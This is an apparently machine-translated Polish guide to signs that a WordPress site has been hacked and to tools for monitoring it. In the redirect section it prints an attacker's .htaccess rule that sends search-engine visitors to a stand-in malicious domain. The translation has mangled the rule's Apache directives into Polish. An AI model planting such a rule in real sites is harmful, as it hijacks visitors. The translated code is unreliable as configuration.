Otwieranie witryny i stwierdzenie, że została zhakowana, nie jest przyjemne. Ale co może pogorszyć sytuację, to fakt, że włamanie może czasami pozostać niezauważone. Nie wszyscy hakerzy pozostawiają widoczne ślady swoich niewłaściwych czynów. Niektóre hacki potrzebują dni, tygodni, a nawet miesięcy, aby przyciągnąć Twoją uwagę. Tymczasem napastnicy mogli wyrządzić rozległe szkody. Mogli wysyłać masowe e-maile, hostować niesmaczne treści, maksymalizować wykorzystanie przepustowości i ostatecznie nadszarpnąć Twoją reputację. Podniesienie się z takiej sytuacji jest niezwykle czasochłonne, a czasami niemożliwe. Powinniśmy podjąć wszelkie środki ostrożności, aby często sprawdzać naszą witrynę pod kątem podejrzanych działań. Oto kilka przydatnych wskazówek, które bardzo pomogą Ci zidentyfikować wszelkie ataki hakerskie w Twojej witrynie.
Zhakowany? Szukaj oczywistości
Niektóre hacki są bardzo trudne i złożone, ale wiele innych nie. Zacznijmy więc od tych oczywistych. Choć są hakerzy, którzy działają w ukryciu, są też tacy, którzy chcą ogłosić światu swoje wyczyny. Takie ataki zwykle polegają na zniszczeniu strony głównej witryny, dodaniu nieprzyjemnych wyskakujących okienek lub przekierowaniu witryny na inny adres URL. Dlatego też, wypatrując jakichkolwiek oznak włamań, należy zwrócić uwagę na oczywiste zmiany.
Zniszczona strona główna — najbardziej oczywisty znak, że zostałeś zhakowany
Jest to prawdopodobnie najbardziej oczywisty znak, że zostałeś zhakowany. Hakerzy często chcą napawać się swoimi exploitami. Aby uzyskać maksymalny efekt, zmieniają stronę główną Twojej witryny. Niestety, dzieje się to dopiero po zakończeniu exploita. W najgorszym przypadku na koniec wyczyszczą całą witrynę, pozostawiając tylko ten obraz na stronie głównej. Nic nie daje hakerom większej satysfakcji niż wywoływanie udręki i zawstydzenia. W tym celu hakerzy mogą również wykorzystać Twoją witrynę do hostowania niesmacznych i wulgarnych treści.
Awaria witryny
Czy widzisz A Nie znaleziono strony (Błąd 404) podczas próby uzyskania dostępu do Twojej witryny? Możliwe, że Twoja witryna uległa awarii. Możesz być programistą modyfikującym kod lub administratorem próbującym zainstalować motyw lub wtyczkę. Coś może pójść nie tak w procesie, co może spowodować awarię. Są też chwile, kiedy to pojawia się niespodziewanie. Pewnego pięknego poranka próbujesz uzyskać dostęp do swojej witryny i puf! już nie ma. W takich sytuacjach jest prawdopodobne, że Twoja witryna została zaatakowana. Upewnij się, że dokładnie przeanalizowałeś swoje logi, aby zawęzić zakres przypadku awarii.
Biały ekran śmierci
Mówiąc o oczywistych znakach, jak możemy pominąć Biały ekran śmierci (WSOD)? Każdy błąd w WordPressie objawia się pustą białą stroną bez informacji. Biały ekran śmierci WordPressa jest zwykle porównywany do niebieskiego ekranu śmierci systemu Windows, tj. uniemożliwia działanie bloga lub witryny WordPress i nie można uzyskać dostępu do pulpitu nawigacyjnego WordPress. Istnieje wiele przypadków, w których użytkownicy widzą WSOD po zalogowaniu się na swoje konta administratora . Dzieje się tak, ponieważ hakerzy usunęli niektóre części Twojej witryny.
Przekierowanie strony internetowej
Kolejnym pewnym sygnałem, że Twoja witryna została zhakowana, jest przejście pod nowy adres URL podczas odwiedzania strony głównej. Osiąga się to poprzez modyfikację plik htaccess który jest obecny na Twoim serwerze. Osoby atakujące dodają do pliku htaccess następującą regułę, dzięki której wszyscy odwiedzający zostaną przekierowani do dowolnej wybranej przez nich witryny.
| Przepisz silnik włączony PrzepiszWarunek %{HTTP_REFERER} .*ask.com.*$ [NC,OR] PrzepiszWarunek %{HTTP_REFERER} .*google.*$ [NC,OR] Przepisz warunek %{HTTP_REFERER} .*msn.com*$ [NC,OR]PrzepiszWarunek %{HTTP_REFERER} .*bing.com*$ [NC,OR] Przepisz warunek %{HTTP_REFERER} .*aol.com*$ [NC,OR] PrzepiszWarunek %{HTTP_REFERER} .*altavista.com*$ [NC,OR] PrzepiszWarunek %{HTTP_REFERER} .*search.yahoo*$ [NC] RewriteRule .* http://malicious-domain.com/bad.php?t=3 [R,L] |
Powyższy kod przepisywania sprawdza stronę odsyłającą żądania. Jeśli stroną odsyłającą jest popularna wyszukiwarka, przekierowują ją do witryny ze złośliwą domeną i ładują plik zły.php scenariusz. Od tych PrzepiszWarunek instrukcje warunkowe będą pasować tylko do botów wyszukiwarek, a nie do Twoich własnych żądań, tego typu hacki mogą pozostać niezauważone przez długi czas. Niestety, im dłużej są aktywne, tym większy potencjał mają wpływ na rankingi w wyszukiwarkach.
Dziwne wyskakujące okienka
Częste, nieoczekiwane wyskakujące okienka otwierające się w Twojej witrynie to kolejna oznaka złośliwego oprogramowania. Te wyskakujące okienka są prawdziwą irytacją dla użytkowników. Ale to nie koniec. Niektóre wyskakujące okienka mogą również zbierać dane na temat sposobu przeglądania, przechwytywać pliki cookie i inne wrażliwe dane bez Twojej zgody i wysyłać je innym osobom za pośrednictwem Internetu. Kliknięcie niektórych z tych wyskakujących reklam lub po prostu ich „zamknięcie” może spowodować pobranie wirusa lub złośliwego oprogramowania do systemu.
Witryna zablokowana
Jeśli zauważysz, że Twoja witryna została nagle zablokowana przez hosting, prawdopodobnie doszło do ataku hakerskiego. Powtarzające się próby użycia siły lub nagły wzrost wykorzystania przepustowości to klasyczne przykłady sytuacji, w których Twój host może Cię zablokować. Jest to głównie reakcja z ich strony, mająca na celu ochronę własnych serwerów, a nie ochronę Twoich interesów. Chociaż niektórzy gospodarze są na tyle uprzejmi, że wysyłają Ci powiadomienie, a nawet podają powód zablokowania Twojej witryny, większość dostawców po prostu milczy po zablokowaniu Cię.
Często skanuj swoją witrynę
Często skanuj, aby sprawdzić, czy nie ma żadnych anomalii. Istnieją różne opcje, takie jak wtyczka Wordfence Security, Sucuri SiteCheck i WPScan, których możesz użyć do wykrywania złośliwego oprogramowania w swojej witrynie. Skanery te wykrywają wszystkie znane problemy bezpieczeństwa, w tym infekcje złośliwym oprogramowaniem, spam i nieregularne przekierowania.
Bezpieczeństwo Wordfence’a
The Wtyczka bezpieczeństwa Wordfence posiada wbudowany skaner, który identyfikuje znane problemy w Twojej witrynie. Chociaż bezpłatnej wersji wtyczki można używać do ręcznego skanowania witryny, możesz wybrać wersję premium, jeśli chcesz zaplanowanych skanów. Każda wykryta luka zostanie wyświetlona wraz z jej powagą i krokami umożliwiającymi jej rozwiązanie.
Kontrola witryny Sucuri
Kontrola witryny Sucuri to kolejny niezwykle popularny skaner złośliwego oprogramowania. Darmowa wersja wykrywa luki w Twojej witrynie i zgłasza je Tobie. Jeśli chcesz pójść o krok dalej i wyczyścić system (wraz z zaplanowanymi skanami), masz także wersję premium.
WPScan
WPScan to czarna skrzynka WordPress Security Scanner, która identyfikuje znane słabe punkty bezpieczeństwa w instalacjach WordPress. Chociaż skaner obsługuje wiele dobrych funkcji, takich jak łamanie słabych haseł, wyliczanie luk w zabezpieczeniach wtyczek, wyliczanie wersji, konfiguracja jest nieco uciążliwa. Skaner należy pobrać i zainstalować ręcznie na komputerze. Skanowanie można następnie rozpocząć z komputera przy użyciu argumentów wiersza poleceń (polecenia tekstowe). Chociaż doświadczony administrator może nie mrugnąć okiem podczas korzystania z tego narzędzia, dla przeciętnego użytkownika może to być dość przytłaczające.
Monitoruj zmiany plików
Gdy hakerzy próbują wprowadzić do Twojej witryny złośliwe oprogramowanie, przesyłają złośliwe skrypty lub modyfikują istniejące pliki. Luka w zabezpieczeniach TimThumb jest jednym z przykładów, w którym plik przesłane katalog był używany do przesyłania skryptów PHP. The Luka w MailPoecie to kolejny przykład. Skrypty te są następnie wykonywane zdalnie przez hakerów, aby siać spustoszenie w Twojej witrynie. W ostatnim czasie doszło do wielu przypadków, w których hakerzy zainstalowali backdoory do późniejszego wykorzystania.
Jednym ze sposobów uniknięcia tego problemu jest ciągłe monitorowanie plików pod kątem aktualizacji. Możesz wyszukiwać nowe pliki, zwłaszcza w formacie przesłane katalog, zmiany w .htaccess i innych ważnych plikach, takich jak indeks.php, login.php, admin.php itp. Istnieją ekskluzywne wtyczki, takie jak Monitor plików WordPressa I Śledzenie zmian WP które pomagają monitorować aktywność plików. Masz również wtyczki zabezpieczające, takie jak Sucuri, które obejmują monitorowanie plików jako część pakietu. Będziesz jednak musiał znieść fałszywe alarmy. O każdej zmianie zostanie wysłane powiadomienie e-mailem, co bardzo utrudnia śledzenie. Co więcej, jest wysoce prawdopodobne, że przesłany złośliwy skrypt pozostanie niezauważony wśród wszystkich powiadomień.
Monitoruj aktywność użytkownika
Nietypowa aktywność użytkowników to kolejny dobry wskaźnik witryny zaatakowanej przez hakerów. Hakerzy zwykle tworzą użytkowników administracyjnych za pomocą ataków polegających na wstrzykiwaniu SQL lub zdalnym wykonywaniu plików. Musisz więc stale monitorować swoją witrynę pod kątem nowych użytkowników administracyjnych. Atakujący mogą także zmienić istniejące hasła lub przypisać użytkownikom nowe role. Monitorowanie tego jest dość trudne, chyba że masz takie narzędzia Dziennik aktywności WP aby ci pomóc.
Traktuj Google poważnie!
Google jest dosłownie starszym bratem naszego internetowego świata. Skanuje witryny i raportuje wszelkie znalezione problemy podczas korzystania Narzędzia Google dla webmasterów. Ale jest tego druga strona. Chociaż dobrze jest jak najwcześniej poznać swój problem i Google w tym pomaga, to jednak nie koniec. Twoi klienci też się o tym dowiedzą. Google wyświetla okna ostrzegawcze, które pojawiają się w przeglądarce podczas odwiedzania potencjalnie zainfekowanej witryny. Nie trzeba dodawać, że ma to bezpośredni wpływ na Twoje rankingi SEO, więc działaj szybko!
Przeanalizuj swoje dzienniki
Zgadzam się, że analizowanie logów jest żmudnym i czasami dość nudnym zajęciem. Ale nigdy nie wiesz, co tam znajdziesz. Niedawno natknąłem się Ten dyskusja na grupie na Facebooku, która jasno pokazuje, jak ważne są logi. Użytkownik odkrył, że jego plik config.php został pobrany zdalnie podczas przeglądania logów. I wiesz, jak zabójcze może się to okazać, prawda? Plik config.php zawiera wiele poufnych informacji, w tym hasło do bazy danych. Dało to wyraźny sygnał Luka w zabezpieczeniach wtyczki Slider Revolution wykorzystywane przez użytkownika. Wyobraź sobie, co by się stało, gdyby użytkownik nie zauważył tego!
Śledź swój ruch
Dotarliśmy do ostatniego, czyli monitorowania Twojego ruchu. Zapewnia szczegółowe informacje o odwiedzających, ale może również wyraźnie wskazywać na włamanie. Jeśli zauważysz nagły wzrost ruchu z kraju, którego zazwyczaj nie obsługujesz, coś musi być nie tak. Z drugiej strony, jeśli zauważysz nagły spadek ruchu, to też nie może być prawdą. Jeśli nie monitorujesz często ruchu, czynniki te mogą pozostać niezauważone, dopóki Twoja witryna nie ulegnie awarii lub nie zostaniesz obciążony wysokim rachunkiem za przepustowość.
Wraz z gwałtownym wzrostem ataków na witryny WordPress musisz zrobić wszystko, aby zachować ochronę. Wykonując poniższe kroki, możesz zminimalizować szkody, jakie może wyrządzić haker. Na koniec nie zapomnij regularnie tworzyć kopii zapasowych swojej witryny. Bądź bezpieczny, bądź szczęśliwy!
